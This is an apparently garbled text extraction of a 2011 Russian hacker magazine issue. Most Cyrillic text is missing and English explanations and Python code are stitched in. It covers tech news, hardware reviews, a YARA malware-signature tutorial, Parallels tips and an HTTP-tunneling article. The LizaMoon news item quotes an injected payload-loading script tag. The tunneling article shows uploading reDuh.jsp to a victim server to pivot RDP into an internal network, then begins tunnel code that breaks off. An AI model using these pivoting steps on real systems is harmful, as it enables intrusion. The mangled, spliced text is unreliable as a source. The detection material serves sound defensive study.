
x 06 (149) 2011

.
210
:

GOOGLE CHROME . 62

06 (149) 2011

/ C *NIX

HTML5

. 106

*NIX-

PHP

149

Silverlight:
BlackHole exploit kit
CISCO
UAC

WEB-
Linux
. 56




:
18-25

XSS Heap overflow
SQL-
, null-byte gigabyte
Black Hat

5

nikitoz@real.xakep.ru
VZLOM

INTRO


.
Forb
.
.
, .
, :
10 , 2001 .
147
2 . . , ,
.


400
7 .
.
- . ,
.
:).
nikitozz, . .
http://vkontakte.ru/xakep_mag

Content
MegaNews

004

Ferrum
016
021


14"

076

082

022
026
030

Parallels Desktop:
Mac
10

036

MIX 2011

Sikuli: Python
5
Microsoft

038

Easy-Hack

042

048
052
056
062
066

088
092

098

UAC

?

102

Silverlight

106

HTML5

110

Silverlight-
HTML5
,

SYN/ACK


TMG 2010

payload

120

Cisco

124

DNS: .

PHP-


Google Chrome

X-Tools

-
BlackHole exploit kit

:
beginners edition
Trend Micro Microsoft Security Essentials


cybercrime

TMG, NIS, GAPA



-

AVG,

075

*nix

114

MALWARE
072

PHREAKING
128

HACK TV

068

HTTP-

032

FSP AURUM GOLD 700 (AU-700)

PC_Zone

Samsung LE650B

134

PSYCHO:
,

140
143
144

FAQ UNITED
FAQ

8.5

WWW2

web-

032


Sikuli: Python

088

056

*nix

PHP-
web-

>
nikitozz
(nikitoz@real.xakep.ru)
>
gorl
(gorlum@real.xakep.ru)
>
PC_ZONE UNITS
step
(step@real.xakep.ru)
, MALWARE SYN/ACK
Dr. Klouniz
(alexander@real.xakep.ru)
UNIXOID PSYCHO
Andrushock
(andrushock@real.xakep.ru)
>

> DVD

Step
(step@real.xakep.ru)
Unix-
Ant
(antitster@gmail.com)
Security-
D1g1
(evdokimovds@gmail.com)


> xakep.ru
(xa@real.xakep.ru)

/ART

>-

>

>
(maligina@glc.ru)


: 8-800-200-3-999

/PUBLISHING

>
( )
(strekneva@glc.ru)
>



>

> -
(alekseeva@glc.ru)
> MAN TV

>
101000, , , / 652,

,

77-11802 14.02.2002
Zapolex,
.
219 833 .

>
, 115280, , . ,19, , 5 , 21
.: (495) 935-7034, : (495) 545-0906
>

>

>.

>

>

>

>

>

>

.: (495) 935-7034, : (495) 545-0906

> TECHNOLOGY
(komleva@glc.ru)
>
(olgaeml@glc.ru)
(alekhina@glc.ru)
>
(polikarpova@glc.ru)

>

>

>
(kosheleva@glc.ru)
>

>

> :
DVD-: claim@glc.ru.
>

: (495) 545-09-06

: (495) 663-82-77


.

. ,
,
.


.
.


:
content@glc.ru
, , 2011

MEGANEWS
Mifrill (mifrill@real.xakep.ru)

Meganews

DROPBOX
: Dropbox,


,
. , ,
:
config.db,
%APPDATA%\Dropbox .
email, dropbox_path host_id.
,
. .
Dropbox host_id,
config.db . ,
config.db Dropbox
,

! , , ,
, host_id .
, config.db host_id? ,

Dropbox .
, : bit.ly/dropbox_fail.

Infosecurity Europe ,
, . ,
IT- . 25% ,
, 20% , - Microsoft, 10% ,
:).

JABBER
,
ICQ, icq Mail.ru Group.
, , , . ,
AOL. :). , icq
, , .
, ,
icq.com.
,
ICQ, .
ICQ , , : ICQ- Mail.Ru Group
. ,
.
. , , Mail.ru
.


X 06 /149/ 2011

MEGANEWS


Apple.
, . ,
,

, . ,
, ( )

.
. Apple
2009 ,
- .
, .

, , .
- . , ,
:
, .
, ,

.

, Ubuntu (11.10)
GNOME.
.

LIZAMOON
,
- LizaMoon.
. SQL- -,
IIS + MS SQL Server,
. ,
, . , , , . ,
LizaMoon , ,
. .
Google 1 500 000 , URL, ! , ,
, , .
: ,
<script src=hxxp://lizamoon.com/ur.php></script>,
. ,
Windows Stability Center.
,
, .
, Microsoft , -


, , ,
.


WEXLER.HOME 903

>> coding


, ( ,
). , , .
handycraft' , . ,
, .
.
WEXLER.HOME 903 64- Windows 7
, .

. , , ,
.

. WEXLER.HOME
750 . ,
, .

WEXLER.HOME 903 Windows 7 .


64- :
4 .
, Microsoft
Security Essentials Office 2010 Starter ( Word Excel, ).

Intel Core i5-650 3,2 - 4 . CPU



Turbo Boost, (, ). , .

GeForce GTX 460,


Fermi.
DirectX 11 GTX 460 , NVIDIA 3D
Vision, PhysX CUDA
, .
.

WEXLER.HOME 903
4 , .

Windows 7.

WEXLER
Wexler:
+7 (800) 200-9660
www.wexler.ru
Microsoft Windows 7, / ,
Microsoft.

MEGANEWS

. . .
.
, -
, -, , . , . , Google ,
,
. , , Googles Profiles
, .
, . - .
, Google , . , ,
2009 ,
Like.com,
. , Google , , - ?
, .


.
,
Twitter, Facebook, . , Like it
: Google
+1. UI
, ,

. , ,
. ,
Google Contacts Gmail +1 ,
( ). , +1
,
.

Brande Finance Google


. $44 300 000 000 .

, Commodore, 80-
Commodore Amiga. , Commodore USA
-


. Commodore Commodore VIC-Slim,


.
460 x 168 x 16, 1-30.1 , ,
Intel Atom D525 (1,8 )
Intel NM10. 1 2
DDR3-1066, 250 500 ,
Ethernet 100 /, 802.11b/g/n Wi-Fi Bluetooth,
Realtek HD Audio. Commodore VIC-Slim
USB 2.0, COM, VGA, .
. $295 ,
. . 1 ,
250 , Wi-Fi Bluetooth $395.
Wi-Fi Bluetooth, 2 500 $495. :).

MEGANEWS

NINTENDO
Move Play Station Kinect
Xbox 360
, .
, ,
Nintendo Wii. Wii
, Nintendo, , ,

Wii . : 2009
2010-2011
66%! Nintendo, , ,

( , 2012 )
Wii.
Wii 2 2- ,
, . ,

E3,
.
, FullHD (1080p,
720p); ,
Blu-Ray; 3D.
, Wii 2

Stream,
,
. -, .
E3 .

77
138 IT.

HTC
HTC
,
. HTC,
12 ,
:). , Android 2.3 Gingerbread
HTC Sense 3.0,
Sensation (
.). .
Sensation
: Qualcomm Scorpion 1.2

+ GPU Adreno 220 768


. SLCD- 4.3"
960540
Gorilla Glass.
, :
, HTC Mozart HTC Desire S.
:
VGA 8- LED, 1080p.
1520 . MicroUSB- Sensation
MHL. ,

HTC Sense

3.0, .
-
. , ,
25-28 000 .




,


. ,
,
, , 1%
. , 1%,
?
, :
, ,
, -


, ,
, ,
, ,
.
, , DVD, , ,
(,
, , ?), .
, , ?
100-150
.


:

, ,

.
, ,
1%
.
(, ,
) ,
, , .

,

. , , , .

MEGANEWS

SONY

, Sony
GeoHot ,
. ,
GeoHot -

PS3
. ,
, Sony
,
, : geohotgotsued.
blogspot.com. ,

GeoHot 31 .
Sony,
, .
,
$10 000 $250 000.

, Sony ,
, .
$10 000,
Sony, Electronic
Frontier Foundation. ,
,

DMCA ACTA, ,
, .
,
:).

,
. 7- 2011 17
.ru.


! 8 2011
N63-
.
, ,
. (1-)
, ,
.
, .

( )

.
,
,

,
, - .

.
: ,
.
,

,
. ,
, .

: rg.ru/2011/04/08/podpisdok.html.

APPLE STORE

, , ,
. ifoAppleStore.com ,
-
Apple .
,
:
Apple Store . ,

,
. , :


2002 ,

2011 2012 . Apple, ,
1500 2.
ifoAppleStore.com,
,
.
Apple
(
iPad 2 120 000
)? .

IMAGINE CUP
16
( ) Microsoft Imagine Cup 2011. Imagine
Cup 8 000 ,
.

. , , Windows Phone 7
Worldwide Telescope . , ,
. . ,
, ,
(
). ,
,
-.
Oriteam
Oricrafter.
.

Calvus
,
.
-!

4% 130 000 000 Avast


-
(110411-1). ,
Avast .
. .

IPHONE . ANDROID .
: .
, Apple (iPhone iPad)
. ,
,
Wi-Fi. ,
, iOS 4. consolidated.db,

iTunes. , ( -)
Apple - , ,
, .
. ? iPhone Tracker (petewarden.github.com)
, ,
iTunes.
, ... , ,
.
? ,
, iTunes Encrypt iPhone Backup. ,


Android-
. cache.cell cache.wifi,
/data/data/com.google.android.location/files,
consolidated.db. Android 50
200 WiFi-. :
12 48 WiFi.


MEGANEWS

WORDPRESS

Wordpress
. ,

Wordpress ,
Wordpress.com
DDoS-,
18 000 000 ,
VIP.
,

,
,
.
Wordpress .
:
root- Automattic, -
WordPress.com. -

, VIP, ,
,

( Facebook Twitter),
(, Amazon S3). , SSL-.

Automattic,
root-,
, ,
.

WEXLER
WEXLER, ,
, . , WEXLER.BOOK T5002, 5- TFT-
LED-. , ,
. , , WEXLER.BOOK T5002
( ASCII, TXT, DOC,PDB,HTML,PDF, FB2), (WMV,
RM, AVI, RMVB, 3GP, FLV, MP4, DAT, VOB, MPG, MPEG, MKV, MOV), (JPEG, BMP, GIF),
(MP3, WMA, APE, FLAC, AAC),
. , ,
WEXLER :
TFT- WEXLER.BOOK T5002 .
7 , 4 ,
- ( ) 25 .
,
.
. WEXLER.BOOK T5002 G-,
.
3499 . WEXLER.BOOK T5002
, .

YOUTUBE
YouTube ,
.
. YouTube ,
.
, -
- ,
, ... .
,

YouTube (Copyright
shcool),
Happy tree friends
(!), ,
,
. .
: youtube.com/
copyright_school.
.

SMS-
.
- 1530%.

DA 5000 PRO
, 5.1
DA 5000 Pro Edifier. ,
, DA5000 Pro .
: -,
DA5000 ( ), , -, DA 5000
Pro
- C3. - MDF
9 , 3 ,
DA 5000 Pro .
.
, LED-
,
, FLASH- / .
: (RMS)
212, (RMS) 212,
(RMS) 12, -

(RMS) 60. 160-20000


, 20-160 .
20 . : 450 . DA 5000
Pro $235.

Fortune , Twitter
. Facebook Twitter
$2 000 000 000 , Google $10 000 000 000.
.


, ,
. ,
, .
- (Pokerstars, Full Tilt
Poker Absolute Poker) . ,

.
:
, ,
,
.
,
,
( ). PokerStars Full Tilt
Poker , ,
, .
, .
Absolute Poker

,
- .

FERRUM


14"
,
, ,
. ,
,
: ,
, , . .

, ,
, ,
14 .

3DMark06. ,
PCMark Vantage ,
7-Zip WinRAR
-, SuperPI,
.
Battery Eater Pro,
:
, Wi-Fi 40%. :
, .


, .
, , , .
? - ,
- ,
. -,
. .
,
.
, , ,
.


Acer Aspire TimeLineX 3820T (26000 rub.)
Display: 13.3"
CPU: Intel Core i5-430M, 2266 MHz
RAM: 4 GB DDR3-1066
Graphics: ATI Mobility Radeon HD 5650, 1024 MB; Intel GMA HD
HDD: 300 GB
Dimensions: 324x235x22 mm
Weight: 1.8 kg

ASUS U43Jc (39000 rub.)
Display: 14"
CPU: Intel Core i7-620M, 2666 MHz
RAM: 4 GB DDR3-1066
Graphics: NVIDIA GeForce 310M, 1024 MB; Intel GMA HD
HDD: 500 GB
Dimensions: 344x241x32 mm
Weight: 2.18 kg

Acer ,
. Acer Aspire TimeLineX 3820T .

Intel Core i5,
, . 3DMark06,
Acer Aspire TimeLineX .
. , ,
. ,
.

, , ,

.
ASUS U43Jc . ,
. :
Intel Core i7
NVIDIA, ASUS U43Jc .
.
0.5 .
- -,
. ,
2.5 .

,
, . , ,
.


. ,
.


FERRUM

Dell Vostro 3300 (31000 rub.)
Display: 13.3"
CPU: Intel Core i7-640M, 2800 MHz
RAM: 4 GB DDR3-1066
Graphics: NVIDIA GeForce 310M (1024 MB); Intel GMA HD
HDD: 500 GB
Dimensions: 325x229x29 mm
Weight: 1.81 kg

HP Pavilion dm4-1100 (24000 rub.)
Display: 14"
CPU: Intel Core i5-520M, 2400 MHz
RAM: 4 GB DDR3-1066
Graphics: ATI Mobility Radeon HD 5470, 512 MB; Intel GMA HD
HDD: 500 GB
Dimensions: 341x228x32 mm
Weight: 2 kg

, , , .
Dell Vostro 3300. , ,
. , ,
, ,
, . :
Intel Core i7, 4 ,
0.5 .
, , .

, ,
,
, .
:
(

) Intel Core i5 ( ). 14
,
. , , 500 .

, ,
.
, . ,
.



, F1-F12 Fn
.

Samsung SF410-S01 (30000 rub.)
Display: 14"
CPU: Intel Core i5-460M, 2530 MHz
RAM: 4 GB DDR3-1333
Graphics: NVIDIA GeForce 310M, 512 MB; Intel GMA HD
HDD: 500 GB
Dimensions: 347x246x32 mm
Weight: 2.17 kg

Sony VPC-YA1V9R/B (30000 rub.)
Display: 11.6"
CPU: Intel Core i3-380UM, 1333 MHz
RAM: 4 GB DDR3-1333
Graphics: Intel GMA HD
HDD: 500 GB
Dimensions: 290x202x25 mm
Weight: 1.5 kg

Samsung . .
,
(
).
Samsung SF410-S01 , , ,
.
!

Sony ,
12, 1.5 . ,
Intel Core i3-380UM, 1.5
.
, .

, .

.

, , .


, .
,
.


FERRUM

[Charts: PCMark Vantage, 3DMark06, WinRAR, 7-Zip and Super Pi results for the Sony VPC-YA1V9R/B, Samsung SF410-S01, HP Pavilion dm4-1100, Dell Vostro 3300, ASUS U43J and Acer Aspire TimeLineX 3820T.]

. Samsung SF410-S01
,
Acer Aspire TimeLineX 3820T,
. z

, ,


FERRUM

FSP AURUM GOLD 700 (AU-700)

Rated power: 700 W
Efficiency: 87%
+12V rails: 4
Max current: +3.3V 28 A, +5V 28 A, +12V1-V4 18 A, -12V 0.5 A, +5Vsb 3.5 A
Combined power: +3.3V & +5V 160 W, +3.3V & +5V & +12V1 & +12V4 672 W
PFC:
Fan: 120 mm
Dimensions: 150x140x86 mm
Weight: 1.9 kg
Price: 3700 rub.


.
, . ,
.
,
. FSP,
AURUM ( )
.
AURUM GOLD 700.



, ,
, ,
FSP. AURUM GOLD 700
-
. ()
:
, . ,
6+2 pin, SATA Molex.
.
AURUM GOLD 700 700 , 87% ( 80Plus Gold). 28 +3,3V +5V, 18
+12V. 120- ,
.


FSP AURUM GOLD 700

D-RAM DBS-2200.
. 850 .

.
. +12V
100 ,
+3.3V +5V 20 . .
+12V 200 , .
FSP AURUM GOLD 700: +3.3V &
+5V 160 , +12V1 & +12V4 500 .
, : +3.3V, +5V, +12V.
( )
, , . - ATX 1% 5%.

?
FSP AURUM GOLD 700
. , ,
,
.
, ,

, .


+ 80 PLUS Gold
+
-
-
-
, . 3%,
.
,
. AURUM
GOLD 700 , ,
. , ,
. z


PC_ZONE
Ant


.
,

/.
.

, .
. ,
, ,

. ,
,
.
,
-, .
-
, . .

,
. , ,


.
. , N .
, (
EB ?? ?? CD 13). - . .
,
, (, ASPack).
,
PEiD,
, ( ) PE-. ,
,
,
. , PEiD (
) .


YARA
- , .
, ,
. YARA (code.google.com/p/yara-project).

YARA?

, - ,
.
,
-, , .
, YARA.

.
, , .
. ,
,
.
, ( ,
-). , ,
:
rule silent_banker : banker
{
meta:
description = "This is just an example"
thread_level = 3
in_the_wild = true
strings:
$a = {6A 40 68 00 30 00 00 6A 14 8D 91}
$b = {8D 4D B0 2B C1 83 C0 27 99 6A 4E 59 F7 F9}
$c = "UVODFRYSIHLNWPEJXQZAKCBGMT"
condition:
$a or $b or $c
}

YARA, , -, $a,
$b, $c, silent_banker.
.
( ).
YARA ,
, :
VirusTotal Malware Intelligence Services (vt-mis.com);
jsunpack-n (jsunpack.jeek.org);
We Watch Your Website (wewatchyourwebsite.com).
Python,
, , YARA

ASPack
. ,

.
, ,
YARA , PEiD.
.

, Python,
Linux, Windows, Mac.
.
, .
$ yara
usage: yara [OPTION]... [RULEFILE]... FILE | PID

:
, ,
, ( , ), .
- , ,
. - , YARA
.

: ?
(- , - ). ,
, - -
. , ,
. ClamAV
(clamav.net/lang/en). Latest
Stable Release ,
ClamAV. main.cvd (db.local.clamav.net/main.cvd) daily.cvd (db.local.clamav.net/daily.cvd).
,
. daily.cvd, 100
000 . ClamAV YARA,
. ?
ClamAV, Yara. ,
,
ClamAV YARA. clamav_to_yara.py (bit.ly/ij5HVs).
:
$ python clamav_to_yara.py -f daily.cvd -o clamav.yara

clamav.yara ,
.


PC_ZONE

ASPack-
system32
YARA ClamAV .
:

PEiD YARA
$ yara -r clamav.yara /pentest/msf3/data

-r ,
.
/pentest/msf3/data - (
, ClamAV), YARA
. , .
,
ClamAV, YARA. . ,
/.
.

A rule looks much like a struct{} in C/C++: a name and a block in braces. Here is a simple one:
rule BadBoy
{
    strings:
        $a = "win.exe"
        $b = "http://foo.com/badfile1.exe"
        $c = "http://bar.com/badfile2.exe"
    condition:
        $a and ($b or $c)
}

Taking it apart:
1. A rule begins with the keyword rule followed by its identifier. Identifiers follow the C/C++ rules: letters, digits and underscores, not starting with a digit, and at most 128 characters long.
2. The body has two sections: strings and condition. strings declares the patterns to search for; condition says which combination of them counts as a match.
3. Every entry in strings has an identifier starting with $, as variables do in PHP. YARA distinguishes text strings, written in double quotes, from hex strings, written in braces ({}):
$my_text_string = "text here"
$my_hex_string = { E2 34 A1 C8 23 FB }
4. condition is a boolean expression over the string identifiers, combined with and, or and not. If it evaluates to true the rule matches, otherwise it does not. For BadBoy this means: the file must contain win.exe together with at least one of the two URLs, and only then is it reported as BadBoy (the rule name is arbitrary).
5. Hex strings may contain wildcards, jumps and alternatives, which makes a signature tolerant of small changes in the sample. A ? stands for an unknown nibble, so ?? matches any byte and A? any byte whose high nibble is A:
$hex_string = { E2 34 ?? C8 A? FB }
A jump in square brackets stands for a run of arbitrary bytes of variable length; [4-6] means between 4 and 6 bytes:
$hex_string = { F4 23 [4-6] 62 B4 }
Alternatives are written in parentheses and separated by |:
$hex_string = { F4 23 ( 62 B4 | 56 ) 45 }
Either 62 B4 or 56 is accepted at that position, so this string matches both F42362B445 and F4235645.
6. The condition can also say where a string must occur: at a fixed offset with at, or within an offset range with in (filesize is the size of the scanned file):
$a at 100 and $b at 200
$a in (0..100) and $b in (100..filesize)
7. When it is enough that some of the strings are present, use of with a count and a string set:
rule OfExample1
{
    strings:
        $foo1 = "dummy1"
        $foo2 = "dummy2"
        $foo3 = "dummy3"
    condition:
        2 of ($foo1,$foo2,$foo3)
}
The rule matches when at least two of the three strings are found. Instead of a number you can write any (at least one) or all (every string in the set).
8. The for..of form applies a condition to each string of a set:
for expression of string_set : ( boolean_expression )
boolean_expression is evaluated for every string in string_set, with $ standing for the string being tested; the whole expression is true when at least expression of them satisfy it. The packer rule at the end of the article relies on exactly this form.
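To make the hex-string syntax tangible, here is an added example (not code from the article or from the YARA project): a small Python translator that compiles the body of a YARA hex string into a bytes regex, supporting the ?? and A? wildcards, the [n-m] jumps and the ( A | B ) alternatives described above, plus helpers that mimic the at and in conditions. The sample buffers in the tests and in the main block are constructed for the demonstration.

```python
import re


def _nibble_class(tok: str) -> str:
    """Regex character class for a byte token with one wildcard nibble (A? or ?A)."""
    hi, lo = tok[0], tok[1]
    if hi == "?":
        values = [(h << 4) | int(lo, 16) for h in range(16)]
    else:
        values = [(int(hi, 16) << 4) | l for l in range(16)]
    return "[" + "".join(re.escape(bytes([v])).decode("latin-1") for v in values) + "]"


def yara_hex_to_regex(pattern: str):
    """Compile the body of a YARA hex string into a compiled bytes regex.

    Handles ?? / A? / ?A wildcards, [n], [n-m] and [n-] jumps and ( A | B )
    alternatives (nesting allowed). The regex is wrapped in a lookahead so that
    overlapping occurrences are reported, as YARA reports them.
    """
    body = pattern.strip()
    if body.startswith("{") and body.endswith("}"):
        body = body[1:-1]
    tokens = re.findall(r"\[[^\]]*\]|\(|\)|\||[0-9A-Fa-f?]{2}", body)
    parts = []
    for tok in tokens:
        if tok == "(":
            parts.append("(?:")
        elif tok in (")", "|"):
            parts.append(tok)
        elif tok.startswith("["):                         # jump
            lo, dash, hi = tok[1:-1].replace(" ", "").partition("-")
            lo = int(lo or 0)
            if not dash:
                parts.append(".{%d}" % lo)                # [4]   exactly 4 bytes
            elif hi:
                parts.append(".{%d,%d}" % (lo, int(hi)))  # [4-6] 4 to 6 bytes
            else:
                parts.append(".{%d,}" % lo)               # [4-]  4 or more bytes
        elif tok == "??":
            parts.append(".")                             # any byte
        elif "?" in tok:
            parts.append(_nibble_class(tok))              # half-known byte
        else:
            parts.append(re.escape(bytes([int(tok, 16)])).decode("latin-1"))
    regex = "(?=(" + "".join(parts) + "))"
    return re.compile(regex.encode("latin-1"), re.DOTALL)   # DOTALL: '.' must match 0x0A too


def find_matches(pattern: str, data: bytes) -> list:
    """Offsets of every occurrence of the hex string in data (overlaps included)."""
    return [m.start() for m in yara_hex_to_regex(pattern).finditer(data)]


def match_at(pattern: str, data: bytes, offset: int) -> bool:
    """Equivalent of the condition '$s at offset'."""
    return offset in find_matches(pattern, data)


def match_in(pattern: str, data: bytes, start: int, end: int) -> bool:
    """Equivalent of the condition '$s in (start..end)' (inclusive range)."""
    return any(start <= off <= end for off in find_matches(pattern, data))


if __name__ == "__main__":
    # Constructed buffers exercising the three constructs from the text.
    print(find_matches("{ E2 34 ?? C8 A? FB }", b"\x00\xe2\x34\x99\xc8\xaf\xfb"))
    print(find_matches("{ F4 23 [4-6] 62 B4 }", b"\xf4\x23" + b"\x11" * 5 + b"\x62\xb4"))
    print(find_matches("{ F4 23 ( 62 B4 | 56 ) 45 }", bytes.fromhex("F4235645")))
```

The translator is deliberately limited to what the text covers; real YARA also has string modifiers (nocase, wide, ascii) and regular-expression strings that are not handled here.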

PEiD

, ,
.

PEiD. plugins userdb.txt,
, . 1850 .
, , ,
- .
,
:
[Name of the Packer v1.0]
signature = 50 E8 ?? ?? ?? ?? 58 25 ?? F0 FF FF 8B C8 83 C1 60 51 83 C0 40 83 EA 06 52 FF 20 9D C3
ep_only = true

,
PEiD, .
. ep_only,

, ,
.
, , , ASPack? , . , , packers.yara.
PEiD , ASPack,
:
rule ASPack
{
    strings:
        $ = { 60 E8 ?? ?? ?? ?? 5D 81 ED ?? ?? (43 | 44) ?? B8 ?? ?? (43 | 44) ?? 03 C5 }
        $ = { 60 EB ?? 5D EB ?? FF ?? ?? ?? ?? ?? E9 }
        [.. ..]
        $ = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 }
    condition:
        for any of them : ($ at entrypoint)
}

ep_only true,
.
: for any of them : ($ at entrypoint).
,
, ASPack.
,
$, . ,
condition- - ,
.
, :
$ yara -r packers.yara somefile.exe

, ASPack, , !
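The conversion just described, as an added example (this is neither the author's packers.yara nor code from YARA or PEiD): a Python script that reads entries in the userdb.txt format, groups them by packer family and emits one YARA rule per family, turning ep_only = true entries into strings that must sit at the entry point and the rest into strings that may occur anywhere. SAMPLE_USERDB is constructed in the file's format for the demonstration and is not copied from the real database.

```python
import re

# Constructed entries in the format of PEiD's plugins/userdb.txt (illustrative,
# not copied from the real database): [name], signature = ..., ep_only = true/false
SAMPLE_USERDB = """\
; comment lines start with a semicolon
[ASPack v2.12 -> Alexey Solodovnikov]
signature = 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01
ep_only = true

[ASPack v1.08.03]
signature = 60 E8 00 00 00 00 5D 81 ED 0A 4A 44 00 BB 04 4A 44 00
ep_only = true

[UPX v0.89.6 - v1.02 / v1.05 - v1.22]
signature = 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF EB 10
ep_only = true

[FooStrings 1.0]
signature = 46 4F 4F 53 54 52
ep_only = false
"""


def parse_userdb(text: str) -> list:
    """Parse userdb.txt into dicts {name, signature, ep_only}.

    A signature that has been wrapped onto several lines (as in the printed
    excerpt above) is joined back together.
    """
    entries, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = {"name": line[1:-1].strip(), "signature": "", "ep_only": False}
            entries.append(current)
        elif current is None:
            continue
        elif "=" in line:
            key, _, value = line.partition("=")
            key, value = key.strip().lower(), value.strip()
            if key == "signature":
                current["signature"] = value
            elif key == "ep_only":
                current["ep_only"] = value.lower() == "true"
        elif re.fullmatch(r"(?:[0-9A-Fa-f?]{2}\s*)+", line):
            current["signature"] = (current["signature"] + " " + line).strip()
    return entries


def rule_identifier(name: str) -> str:
    """Packer family taken from the entry name, made into a legal YARA identifier
    (letters, digits, underscore; not starting with a digit; at most 128 chars)."""
    family = re.split(r"[\s\-/(>]", name.strip())[0]
    ident = re.sub(r"[^A-Za-z0-9_]", "_", family)
    if not ident or ident[0].isdigit():
        ident = "_" + ident
    return ident[:128]


def userdb_to_yara(text: str) -> dict:
    """Build one YARA rule per packer family; returns {identifier: rule text}.

    'entrypoint' is the keyword of the YARA version the article uses; in
    YARA 3 and later use 'import "pe"' and pe.entry_point instead.
    """
    groups = {}
    for entry in parse_userdb(text):
        if entry["signature"]:
            groups.setdefault(rule_identifier(entry["name"]), []).append(entry)
    rules = {}
    for ident, entries in groups.items():
        lines = ["rule %s" % ident, "{", "    strings:"]
        at_ep, anywhere = [], []
        for i, entry in enumerate(entries):
            sid = ("$ep%d" if entry["ep_only"] else "$any%d") % i
            (at_ep if entry["ep_only"] else anywhere).append(sid)
            lines.append("        %s = { %s }  // %s" % (sid, entry["signature"], entry["name"]))
        conditions = []
        if at_ep:                      # ep_only = true: must sit at the entry point
            conditions.append("for any of (%s) : ($ at entrypoint)" % ", ".join(at_ep))
        if anywhere:                   # ep_only = false: anywhere in the file
            conditions.append("any of (%s)" % ", ".join(anywhere))
        lines += ["    condition:", "        " + " or ".join(conditions), "}"]
        rules[ident] = "\n".join(lines)
    return rules


if __name__ == "__main__":
    print("\n\n".join(userdb_to_yara(SAMPLE_USERDB).values()))
```

Redirect the output to packers.yara and the yara -r invocation from the text works unchanged; grouping by family is what gives the multi-string ASPack rule shown above rather than one rule per version line.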

YARA . -.
,
,
. , ,
. ,
! z


PC_ZONE

PARALLELS
DESKTOP:

MAC
10

Windows-
Linux-. Mac OS X .
Mac
Parallels Desktop.
. Mac OS
.
Virtual PC for Mac,


.
- .
, Apple -
Intel (

PD

: Coherence
) Boot Camp
Mac OS Windows.
Parallels, ,
Parallels Desktop for Mac.
Intel VT,
.

,
.

( , USB- ). , , .

.
Parallels Desktop
.
Virtual Box.
Mac.
Parallels Desktop ,
. ,
, .
Apple,
. PD6
, , .

#1.
RAM

RAM (, ,
Mac) , (Mac OS Windows) -
. Parallels Desktop 1 . ,
,
, .
:
Mac OS, -
. ?
: ,

Windows
, Parallels Desktop.
. ,
,
,
. Windows 7

(resmon.exe) . (+10%
) .

. , . ,
RAM , .
( HDD)
Mac OS.

. PD
64 ,
Windows ,
.

#2. 1,5-2


Apple MacBook Pro. : Intel HD Graphics
nVidia. :
,

, 3D-. ,
Windows 7, Aero. ,
DirectX . Aero ,
Windows ,
. , Parallels
Desktop ,
DirectX (
Mac OS), OpenGL. , ,
. .
, Mac
,
.
( ) . ,

3D-, -


PC_ZONE

FPS

. PD
3D-.
.
.
3D- , , . ,
.
( Aero) Windows 7
Windows XP 32 (!). ? :
1,5-2 .
, -
. , 3D, . .

#3. PD6
FPS

, Parallels Desktop
, Windows
. .
,
(
). :
1. PD.
2. Windows.
3.
.
, , Far Cry 2. .
, FPS (frames per second
). video.
showFPS=1,
(
).
: FPS,
, .

#4.

Parallels Desktop ,

.
,
,


FPS,
,
. , .

.pvm, /Users/ <_
>//Parallels.
Finder ( ).
config.pvs. XML-.
TextEdit .
, . , ,
.
. - ,
pvm.

#5.

Parallels Desktop 50
Mac OS X Red Hat Enterprise.

( Windows).
, , ,
Parallels Desktop , , .
, . PD
. config.pvs TextEditor, <Cmd+F>
<Autostart>0</Autostart> and change the 0 to 2.
PD, .

#6.
Windows 7


Windows 7. , BIOS,
Windows 7.
, .
, ,
. ! BIOS, config.pvs
TextEditor <HideBiosOnStartEnabled>0</HideBiosOnStartEnabled>, 0 1. Windows 7, <DisableWin7Logo>1</DisableWin7Logo>.

config.pvs

#7.
Coherence

Parallels Desktop
Coherence, Windows- Mac,
. , ,
.
PD :
Windows,
. ,
- Windows.
.
, .

. : config.pvs TextEditor <DisableDropShadow>0</DisableDropShadow>.

#8. SmartMount

Parallels Desktop SmartMount,


(
), DVD.

, ,
. config.pvs
<SharedVolumes> :
a) : <UseExternalDisks>1</UseExternalDisks>. 1, 0 ( )
b) CD/DVD-: <UseDVDs>1</UseDVDs>.
c) / : <UseConnectedServers>1</UseConnectedServers>.

#9.

Windows Windows Mac OS X.


,
. ,
Windows Mac
OS X , - , Windows Mac OS X.
Mac OS X, config.pvs
AutoMountNetworkDrives.
, Parallels Desktop
Mac.
Windows ,
. Mac OS X. ,
, Windows.

#10.

,
.
. , ( , ),
, ,
. , ?! Suspend/Resume,

.

.
, . z


PC_ZONE
Step (twitter.com/stepah)

HTTP-

, HTTP-.
,
TCP- HTTP, ,
. ,



-, .

-,


,
!
,
HTTP GET- POST-

.
,
base64.
,
.

: reDuh (sensepost.com/labs/tools/pentest/reduh) HTTPTunnel (httptunnel.sourceforge.net). ,
(, -)
: JSP, PHP
ASPX. ,
-,
.

Java , ,
. ,
?
.
, ,
,
HTTP-.
, -
RDP-
term-serv.victim.com,
-
. HTTP-


.
HTTP. :
1.
reDuh.jsp,
(ubunt00.victim.com/uploads/reDuh.jsp).
,
.
2.
reDuh reDuhClient.
,

:
$ java reDuhClient ubunt00.victim.com 80 /uploads/reDuh.jsp

3.

,
1010 .

1234 3389 (RDP) term-serv.victim.com,
:
[createTunnel]1234:term-serv.victim.com:3389

4. , RDP-
localhost:1234, TCP-
HTTP-, ubunt00.victim.com/uploads/reDuh.jsp, .
,
.

, reDuh ,

(, SSH) !
HTTPTunnel,
.


GUI- ( Windows).
:
PHP Perl. HTTPTunnel
SOCKS-.
, (,
RDP-), (
, term-serv.victim.com).
, SOCKS,
HTTPTunnel. ,
-
,
FreeCap (freecap.ru), tsocks (tsocks.sourceforge.net) . z
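To make the mechanics of such a tunnel concrete, here is an added example in Python (it is not reDuh's or HTTPTunnel's code): a server-side endpoint that holds the TCP connection to the internal host, the role reDuh.jsp plays, and a client that exposes a local port and ships everything to and from it base64-encoded in HTTP POST bodies, the role of reDuhClient. Host names and ports are placeholders; demo() wires both halves to a constructed echo server on the loopback interface so the whole path can be run offline.

```python
import base64, itertools, select, socket, socketserver, threading
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer
from urllib.parse import parse_qs, urlparse
from urllib.request import ProxyHandler, Request, build_opener

OPENER = build_opener(ProxyHandler({}))      # ignore any http_proxy setting for the demo


class TunnelEndpoint(BaseHTTPRequestHandler):
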